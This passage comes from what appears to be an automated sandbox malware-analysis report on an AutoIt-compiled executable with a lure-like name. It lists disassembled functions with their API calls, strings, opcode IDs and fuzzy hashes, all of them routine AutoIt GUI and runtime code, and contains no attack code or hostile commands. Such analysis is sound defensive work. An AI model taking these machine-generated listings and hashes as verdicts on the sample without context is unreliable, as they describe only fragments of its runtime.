                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: ec9425e2aa36b6cf5d7431807d73543de8a09b5fd0d2a000a6e2420874503bfd
                                          • Instruction ID: 2cca897b3cef091b365aba0c7a9138eeb71eab0cb026d05245c960759d9a5c34
                                          • Opcode Fuzzy Hash: ec9425e2aa36b6cf5d7431807d73543de8a09b5fd0d2a000a6e2420874503bfd
                                          • Instruction Fuzzy Hash: B3A17E71A40219BFEB14DBA5DC4AFABBBB9EB44714F008214FA14B72E0D774AD44CB60
                                          Function 00E5AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E5AF89
                                          • GetDriveTypeW.KERNEL32(?,00E7FAC0,?,\\.\,00E7F910), ref: 00E5B066
                                          • SetErrorMode.KERNEL32(00000000,00E7FAC0,?,\\.\,00E7F910), ref: 00E5B1C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: 23b683f2819d6fd9d35541e75171565e745685fd5ae8af153459ba5915856723
                                          • Instruction ID: 5b5149b183a0885d2dde94f2633c1930e8811903d2edff51cf2a29a2dfc4f6ee
                                          • Opcode Fuzzy Hash: 23b683f2819d6fd9d35541e75171565e745685fd5ae8af153459ba5915856723
                                          • Instruction Fuzzy Hash: C351E930645705DB8B40DB10CA629FE73B0EB19347724A826FD0ABB1D0CB35AD49DB62
                                          Function 00DF6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 1038674560-86951937
                                          • Opcode ID: f2e932bc22e209e10c62593904a164d8227b99ceda793c0f61a6813567f76be0
                                          • Instruction ID: f1f6e903931bdd9ce239672b40fbebb1a2f2e5421742f363de64dfb3b4ee6508
                                          • Opcode Fuzzy Hash: f2e932bc22e209e10c62593904a164d8227b99ceda793c0f61a6813567f76be0
                                          • Instruction Fuzzy Hash: 9D811A70600329AACB24AF60DD92FFE77A8EF15700F099025FB45BA582EB60DA55C271
                                          Function 00E7AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 00E7AB99
                                          • SetTextColor.GDI32(?,?), ref: 00E7AB9D
                                          • GetSysColorBrush.USER32(0000000F), ref: 00E7ABB3
                                          • GetSysColor.USER32(0000000F), ref: 00E7ABBE
                                          • CreateSolidBrush.GDI32(?), ref: 00E7ABC3
                                          • GetSysColor.USER32(00000011), ref: 00E7ABDB
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E7ABE9
                                          • SelectObject.GDI32(?,00000000), ref: 00E7ABFA
                                          • SetBkColor.GDI32(?,00000000), ref: 00E7AC03
                                          • SelectObject.GDI32(?,?), ref: 00E7AC10
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E7AC2F
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E7AC46
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E7AC5B
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E7ACA7
                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E7ACCE
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00E7ACEC
                                          • DrawFocusRect.USER32(?,?), ref: 00E7ACF7
                                          • GetSysColor.USER32(00000011), ref: 00E7AD05
                                          • SetTextColor.GDI32(?,00000000), ref: 00E7AD0D
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E7AD21
                                          • SelectObject.GDI32(?,00E7A869), ref: 00E7AD38
                                          • DeleteObject.GDI32(?), ref: 00E7AD43
                                          • SelectObject.GDI32(?,?), ref: 00E7AD49
                                          • DeleteObject.GDI32(?), ref: 00E7AD4E
                                          • SetTextColor.GDI32(?,?), ref: 00E7AD54
                                          • SetBkColor.GDI32(?,?), ref: 00E7AD5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: 4e15e1fc00e42b153f3a976555745e3a86f3d050c5d1c2eb34d50b4afefe3209
                                          • Instruction ID: 359f018706656446009689ef5551cb2182d16f7361c720bb466f8840be8e6b47
                                          • Opcode Fuzzy Hash: 4e15e1fc00e42b153f3a976555745e3a86f3d050c5d1c2eb34d50b4afefe3209
                                          • Instruction Fuzzy Hash: E0614B71901218FFDF11DFA5DC48AAEBBB9FB48320F148125F919BB2A1D6719D80DB90
                                          Function 00E78C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E78D34
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E78D45
                                          • CharNextW.USER32(0000014E), ref: 00E78D74
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E78DB5
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E78DCB
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E78DDC
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E78DF9
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00E78E45
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E78E5B
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E78E8C
                                          • _memset.LIBCMT ref: 00E78EB1
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E78EFA
                                          • _memset.LIBCMT ref: 00E78F59
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E78F83
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E78FDB
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00E79088
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E790AA
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E790F4
                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E79121
                                          • DrawMenuBar.USER32(?), ref: 00E79130
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00E79158
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0
                                          • API String ID: 1073566785-4108050209
                                          • Opcode ID: cb7fe1b27101353904978612540edabe7112dc4ceb95d22825485a2a9bc2426e
                                          • Instruction ID: 7d46272afb74177d15b03d809b82fc9bc0259d4f3bd8fe27b67cffca4fab9792
                                          • Opcode Fuzzy Hash: cb7fe1b27101353904978612540edabe7112dc4ceb95d22825485a2a9bc2426e
                                          • Instruction Fuzzy Hash: 86E1AF70901209AFDF20DF61CC88AEE7BB9EF14714F109156FA19BA291DB708A85CF60
                                          Function 00E74B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00E74C51
                                          • GetDesktopWindow.USER32 ref: 00E74C66
                                          • GetWindowRect.USER32(00000000), ref: 00E74C6D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E74CCF
                                          • DestroyWindow.USER32(?), ref: 00E74CFB
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E74D24
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E74D42
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E74D68
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00E74D7D
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E74D90
                                          • IsWindowVisible.USER32(?), ref: 00E74DB0
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E74DCB
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E74DDF
                                          • GetWindowRect.USER32(?,?), ref: 00E74DF7
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00E74E1D
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00E74E37
                                          • CopyRect.USER32(?,?), ref: 00E74E4E
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00E74EB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: 58b4f19c800c35506e02243cd8312a3507c9e021e2a28237ed7ef4ff65f97822
                                          • Instruction ID: 8fd5372d34bf75d84d034196964f1c8b060e05fe14d546926f2a16dc191ed1c8
                                          • Opcode Fuzzy Hash: 58b4f19c800c35506e02243cd8312a3507c9e021e2a28237ed7ef4ff65f97822
                                          • Instruction Fuzzy Hash: CEB148B1604341AFDB04DF65C844B6ABBE4FF88714F00891DF599AB2A1D771EC44CBA1
                                          Function 00DF27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DF28BC
                                          • GetSystemMetrics.USER32(00000007), ref: 00DF28C4
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DF28EF
                                          • GetSystemMetrics.USER32(00000008), ref: 00DF28F7
                                          • GetSystemMetrics.USER32(00000004), ref: 00DF291C
                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DF2939
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DF2949
                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DF297C
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DF2990
                                          • GetClientRect.USER32(00000000,000000FF), ref: 00DF29AE
                                          • GetStockObject.GDI32(00000011), ref: 00DF29CA
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DF29D5
                                            • Part of subcall function 00DF2344: GetCursorPos.USER32(?), ref: 00DF2357
                                            • Part of subcall function 00DF2344: ScreenToClient.USER32(00EB67B0,?), ref: 00DF2374
                                            • Part of subcall function 00DF2344: GetAsyncKeyState.USER32(00000001), ref: 00DF2399
                                            • Part of subcall function 00DF2344: GetAsyncKeyState.USER32(00000002), ref: 00DF23A7
                                          • SetTimer.USER32(00000000,00000000,00000028,00DF1256), ref: 00DF29FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: 1e110f73586b85e467b29922e01d3352b4b0f51a9db90186a2107ab07b9f01f5
                                          • Instruction ID: 3c4424c64281d302199b29de0377e139a678291c1dc8593d1e2696924c04966b
                                          • Opcode Fuzzy Hash: 1e110f73586b85e467b29922e01d3352b4b0f51a9db90186a2107ab07b9f01f5
                                          • Instruction Fuzzy Hash: 1FB18C71A0021AEFDB14DFA9DC45BBE7BB5FB08314F118229FA15A7290CB74D840CB60
                                          Function 00E74069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E740F6
                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E741B6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                          • API String ID: 3974292440-719923060
                                          • Opcode ID: a5d3ea4e02d4980756c2343f5fc168bf39354e7c939debda42959d182b61374d
                                          • Instruction ID: 45de97f3574e97cbcbf9dab70c21a20cd6605f6c3f2cf23c906788a5d61cee22
                                          • Opcode Fuzzy Hash: a5d3ea4e02d4980756c2343f5fc168bf39354e7c939debda42959d182b61374d
                                          • Instruction Fuzzy Hash: E0A1A1706142059BCB14EF20C851ABAB7E5FF85314F11A968B99ABB2D2DB30EC45CB61
                                          Function 00E652F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00E65309
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00E65314
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00E6531F
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00E6532A
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00E65335
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00E65340
                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00E6534B
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00E65356
                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00E65361
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00E6536C
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00E65377
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00E65382
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00E6538D
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00E65398
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00E653A3
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00E653AE
                                          • GetCursorInfo.USER32(?), ref: 00E653BE
                                          • GetLastError.KERNEL32(00000001,00000000), ref: 00E653E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Cursor$Load$ErrorInfoLast
                                          • String ID:
                                          • API String ID: 3215588206-0
                                          • Opcode ID: 6b35c0c8dfc6bb3248544aea2ce2fd38fa5c4e46e8e9949db11dd0b954939dd8
                                          • Instruction ID: a5a38e1f9161f7fa1a3eaa43a74d0cc05cfeb0243e742c3ee80528958021dffc
                                          • Opcode Fuzzy Hash: 6b35c0c8dfc6bb3248544aea2ce2fd38fa5c4e46e8e9949db11dd0b954939dd8
                                          • Instruction Fuzzy Hash: F4419270E443196ADB109FBA9C4996FFFF8EF41B50F10452FE519E7290DAB8A400CE61
                                          Function 00E4AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E4AAA5
                                          • __swprintf.LIBCMT ref: 00E4AB46
                                          • _wcscmp.LIBCMT ref: 00E4AB59
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E4ABAE
                                          • _wcscmp.LIBCMT ref: 00E4ABEA
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00E4AC21
                                          • GetDlgCtrlID.USER32(?), ref: 00E4AC73
                                          • GetWindowRect.USER32(?,?), ref: 00E4ACA9
                                          • GetParent.USER32(?), ref: 00E4ACC7
                                          • ScreenToClient.USER32(00000000), ref: 00E4ACCE
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E4AD48
                                          • _wcscmp.LIBCMT ref: 00E4AD5C
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00E4AD82
                                          • _wcscmp.LIBCMT ref: 00E4AD96
                                            • Part of subcall function 00E1386C: _iswctype.LIBCMT ref: 00E13874
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                          • String ID: %s%u
                                          • API String ID: 3744389584-679674701
                                          • Opcode ID: fc21c78c1e9b551f86aa95ac04e1d241dc5736894ddaa4278838ded4ad01503e
                                          • Instruction ID: 2abe8ddd1e78fc092c5803ffd3f604b53910e62d78ec5432d3f7f10f5360235f
                                          • Opcode Fuzzy Hash: fc21c78c1e9b551f86aa95ac04e1d241dc5736894ddaa4278838ded4ad01503e
                                          • Instruction Fuzzy Hash: 70A1E171644206AFD718DF60D884BEAF7E8FF04329F085639F999E2190D730E945CB92
                                          Function 00E4B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00E4B3DB
                                          • _wcscmp.LIBCMT ref: 00E4B3EC
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E4B414
                                          • CharUpperBuffW.USER32(?,00000000), ref: 00E4B431
                                          • _wcscmp.LIBCMT ref: 00E4B44F
                                          • _wcsstr.LIBCMT ref: 00E4B460
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E4B498
                                          • _wcscmp.LIBCMT ref: 00E4B4A8
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E4B4CF
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E4B518
                                          • _wcscmp.LIBCMT ref: 00E4B528
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00E4B550
                                          • GetWindowRect.USER32(00000004,?), ref: 00E4B5B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          • Opcode ID: 3977c633623ee2641c794003c9dd53e9d17e946338a3a371f61179096391bcce
                                          • Instruction ID: bcf505c981a01c8046c9f4d1ba5cc9ae4af8233941ac456b6a0f60c6b8a83d1e
                                          • Opcode Fuzzy Hash: 3977c633623ee2641c794003c9dd53e9d17e946338a3a371f61179096391bcce
                                          • Instruction Fuzzy Hash: B281C7710083059FDB04DF15E885FAAB7E8FF44318F04A56AFD85AA096DB34DD89CBA1
                                          Function 00E7C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • DragQueryPoint.SHELL32(?,?), ref: 00E7C917
                                            • Part of subcall function 00E7ADF1: ClientToScreen.USER32(?,?), ref: 00E7AE1A
                                            • Part of subcall function 00E7ADF1: GetWindowRect.USER32(?,?), ref: 00E7AE90
                                            • Part of subcall function 00E7ADF1: PtInRect.USER32(?,?,00E7C304), ref: 00E7AEA0
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E7C980
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E7C98B
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E7C9AE
                                          • _wcscat.LIBCMT ref: 00E7C9DE
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E7C9F5
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E7CA0E
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E7CA25
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E7CA47
                                          • DragFinish.SHELL32(?), ref: 00E7CA4E
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E7CB41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
